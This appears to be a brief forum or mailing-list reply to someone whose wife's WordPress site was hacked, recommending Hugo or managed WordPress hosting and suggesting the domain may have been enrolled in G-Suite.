Re: my wife's website was hacked

I would recommend a static site generator such as Hugo instead of
Wordpress.  Wordpress is popular, but neither the core nor the
surrounding ecosystem seem to be conscientious of coding for security.
If you want to keep going with Wordpress, then a Wordpress specific
hosting site such as WPEngine wouldn't be a bad way to go

As for the Google verification, there is a decent chance your wife's
domain is now signed up for a G-Suite account